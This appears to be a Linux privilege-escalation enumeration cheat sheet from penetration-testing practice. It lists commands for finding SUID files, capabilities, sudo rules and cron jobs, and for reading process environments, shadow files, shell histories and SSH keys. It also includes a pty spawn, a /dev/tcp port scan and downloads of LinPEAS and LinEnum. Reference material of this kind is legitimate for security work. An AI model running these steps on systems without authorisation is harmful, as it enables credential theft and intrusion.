Enum
Things to do
Basic enum
# First things to check
id # current uid/gid and every group membership
cat /etc/issue /etc/os-release # distribution and release (/etc/issue is the pre-login banner)
uname -a # kernel release and architecture; compare the exact kernel version against published CVEs
cat /etc/passwd # local accounts: uid, home directory, login shell (world-readable)
cat /etc/fstab # configured filesystems and mount options
ps faxwu | cat # process tree with owners; piping through cat avoids terminal-width truncation
lscpu # CPU architecture and flags
cat /etc/shells # login shells the system accepts
cat /etc/group|grep -v ':$' # groups whose member list is non-empty (a trailing ':' means no members)
getent group sudo # accounts in the sudo group (Debian convention; RHEL-style systems use wheel)
# System activity
lastlog # most recent login per account, from /var/log/lastlog
w # who is logged in right now, from where, and what they are running
# System services and installations
dpkg -l | cat # installed packages on Debian-based systems (rpm -qa on RPM-based ones); cat disables paging
systemctl --type=service | cat # service units and their state; cat disables systemctl's pager
# Network
ss -lapunte | cat # listening and established TCP/UDP sockets, numeric, with owning process; -e adds the socket's uid
netstat -ntlp | cat # listening TCP sockets with owning process (legacy net-tools equivalent of ss -ntlp)
ip a # interfaces and assigned addresses
ip route # routing table
route # routing table via legacy net-tools
routel # routing table, one route per line (helper script shipped with iproute2)
cat /etc/iptables/rules.v4 # persisted IPv4 rules (path used by iptables-persistent on Debian-based systems); absent if not installed
iptables -L # live filter-table rules; usually needs root, and nftables-only hosts need nft list ruleset instead
arp -a # neighbor (ARP) cache; ip neigh is the iproute2 equivalent
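# Files
ls -ltrha / /opt /srv /home/* /root/ # top-level layout; -tr sorts oldest first so recently changed entries end up at the bottom
ls -ltrha /tmp /var/tmp /dev/shm # world-writable scratch areas; anything executable left here deserves a look
ls -ltrha /var/www/* # web roots, if any
find /home/ -type f -printf '%T@ %p\n' | sort -nr | head -20 # 20 most recently modified files under /home (epoch mtime first)
find /home/ -type f -printf '%T@:%TY-%Tm-%Td %TH:%TM %p\n'|sort -n|cut '-d:' -f2- # same listing, oldest first, with a readable timestamp
find /home/ -type f -size +0 # non-empty files under /home
find /home -type f -size +0 -name ".*" -exec ls -l {} \; 2>/dev/null # hidden (dot) files with their permissions
find /home -type d -name ".*" -ls 2>/dev/null # hidden (dot) directories
sudo -l # sudo rules that apply to the current user (may prompt for a password); if you need TTY : python3 -c 'import pty; pty.spawn("/bin/bash")'
find / -perm -4000 -exec ls -ldb {} \; 2>/dev/null # setuid files (bit 4000)
find / -perm -6000 -exec ls -ldb {} \; 2>/dev/null # files with BOTH setuid and setgid set; -perm -mode requires every listed bit, use -perm -2000 for setgid alone
find /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin -type f -exec getcap {} \; # file capabilities on the usual binary directories (getcap -r below covers the whole tree)
find / -perm -u=s -type f 2>/dev/null # setuid regular files; symbolic spelling of the -4000 search above, without the ls detail
find / -type f \( -user userblabla -o -group userblabla \) -size +0 -exec file {} + 2>/dev/null # non-empty files owned by a given user or group; 'userblabla' is a placeholder
mount # mounted filesystems and their options (noexec/nosuid/nodev are the ones that matter here)
lsblk # block devices and partitions, including ones that are not mounted
find / -writable -type d 2>/dev/null # directories the current user can write to
cat ~/.bashrc # interactive-shell startup file; PATH changes and aliases set here apply to every new shell
/usr/sbin/getcap -r / 2>/dev/null # every file with capabilities set, whole tree
grep -v "#" /etc/fstab | column -t # fstab entries without comments (grep reads the file directly; no need for cat); compare with the mount output to spot entries that are not currently mounted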
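# Env by process
# One header line per PID (pid plus its ps -f row), then the process environment with the
# NUL separators turned into newlines and filtered through strings.
# Iterates over /proc/<pid> paths instead of cd'ing into /proc, so the caller's working
# directory is left alone when this is pasted into an interactive shell; printf replaces the
# non-portable 'echo -e', and tr reads the file directly instead of via cat.
# environ of processes owned by other users is only readable as root, and the output can
# contain credentials passed through the environment — treat any capture of it as sensitive.
for p in /proc/[0-9]*; do
  pid=${p##*/}
  printf '\n## %s %s\n' "$pid" "$(ps -fp "$pid" 2>/dev/null)"
  tr '\0' '\n' < "$p/environ" 2>/dev/null | strings
done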
# Crons
ls -lah /etc/cron* # system-wide cron directories and /etc/crontab; jobs that run as root should not reference user-writable paths
crontab -l # crontab of the current user
grep "CRON" /var/log/syslog # cron job executions as logged by syslog (reading it usually needs adm/root); on journald-only hosts use journalctl -u cron (unit name varies: cron/crond)
# App armor status
aa-status # loaded AppArmor profiles (enforce/complain) and which processes are confined; the full report usually needs root
# Modules
lsmod # kernel modules currently loaded
/sbin/modinfo interestingmodule # details for one module (file path, version, signer if signed, parameters); 'interestingmodule' is a placeholder name
Scripts
LinPEAS
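# Download first instead of piping straight into sh: the pipe executes whatever the server
# (or anything on the network path) returns, with no chance to review it or check a hash.
# -f makes curl fail on an HTTP error page instead of handing it to the shell, -L follows redirects.
curl -fsSL -o linpeas.sh https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh
# read through the script, and compare its hash with a value you trust
# (<EXPECTED_SHA256 - placeholder, from the project's release page if it publishes one>), then run it
sha256sum linpeas.sh
sh linpeas.sh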
LinEnum
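# Download first instead of piping straight into sh: the pipe executes whatever the server
# (or anything on the network path) returns, with no chance to review it or check a hash.
# -f makes curl fail on an HTTP error page instead of handing it to the shell, -L follows redirects.
curl -fsSL -o LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
# read through the script, and compare its hash with a value you trust
# (<EXPECTED_SHA256 - placeholder, from the project's release page if it publishes one>), then run it
sha256sum LinEnum.sh
sh LinEnum.sh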
SUID Enum
Enumerate SUID programs using only Python 2/3 built-in modules
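# Download first instead of piping straight into python: the pipe executes whatever the server
# (or anything on the network path) returns, with no chance to review it or check a hash.
# -f makes curl fail on an HTTP error page instead of handing it to the interpreter, -L follows redirects.
curl -fsSL -o suid3num.py https://raw.githubusercontent.com/Anon-Exploiter/SUID3NUM/master/suid3num.py
# read through the script, and compare its hash with a value you trust
# (<EXPECTED_SHA256 - placeholder, from the project's release page if it publishes one>), then run it
sha256sum suid3num.py
python suid3num.py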
Watch Process
Watch for existing and newly created processes
Interesting Files
Public
# readable by any local user
/etc/issue # pre-login banner, usually names the distribution
/etc/passwd # local accounts with uid, home directory and login shell
/etc/group # local groups and their members
Root
# readable only as root (or through sudo)
/etc/sudoers # sudo policy; drop-in files live in /etc/sudoers.d/
/etc/shadow # password hashes and password-aging fields
/etc/master.passwd # OpenBSD counterpart of /etc/shadow
/var/spool/cron/crontabs/* # per-user crontabs (Debian-based layout)
/var/spool/cron/* # per-user crontabs (RHEL-style layout)
User
# readable by the owning user (and root)
/home/*/.bash_history # shell command history; can expose credentials typed on the command line, so treat it as sensitive
/home/*/.ssh/* # private keys, known_hosts and authorized_keys; private keys should be mode 600 and the directory 700
Auditd (adm)
When parsing audit logs you may encounter hex-encoded field values (auditd hex-encodes values that contain spaces, quotes or non-printable characters); the loop below decodes them
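# Decode the hex-encoded cmd= / data= fields that auditd writes when a value holds characters
# it will not log verbatim (spaces, quotes, non-printables); values already in "quotes" are plain
# text and are skipped by the grep pattern.
# Reads whole log lines — the previous for-in-$(grep) form split every line on whitespace and fed
# each fragment to xxd — and prints the decoded value with printf rather than an unquoted
# `echo $(cat)`, which glob-expanded and word-split the decoded bytes.
# Arguments: audit log files (default: /var/log/audit/audit.log*; reading them needs adequate privileges)
# Outputs:   one decoded value per line, non-printable bytes stripped, to stdout
decode_audit_hex() {
  local field line
  [ "$#" -gt 0 ] || set -- /var/log/audit/audit.log*
  for field in cmd data; do
    grep -h "$field=[^\"]" "$@" | while IFS= read -r line; do
      printf '%s\n' "$line" | sed "s#.*$field=\([^ ]*\).*#\1#" | xxd -r -p | tr -dc '[:print:]\t\n'
      printf '\n'
    done
  done
}
decode_audit_hex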
Scan Ports
Find listening (possibly hidden) ports on localhost without a port scanner or netstat
# Tries a TCP connect to every port on 127.0.0.1 through bash's /dev/tcp and prints the ones that
# accept; 2>/dev/null hides the connection-refused errors. Covers TCP only, is slow (65535 sequential
# connects), and is loud: on the host it shows up as a burst of loopback connections, which is a
# detection signal in its own right.
bash -c 'for i in {1..65535};do echo>/dev/tcp/127.0.0.1/$i&&echo OK $i;done' 2>/dev/null
Binaries
When you encounter a binary without knowing what it does, you can use strace to list the system calls it makes
# Lists the system calls the program makes; 'binaryname' is a placeholder. strace actually RUNS the
# program, so trace anything untrusted only in a throwaway environment. -f also follows child
# processes and -o FILE writes the trace to a file instead of stderr.
strace binaryname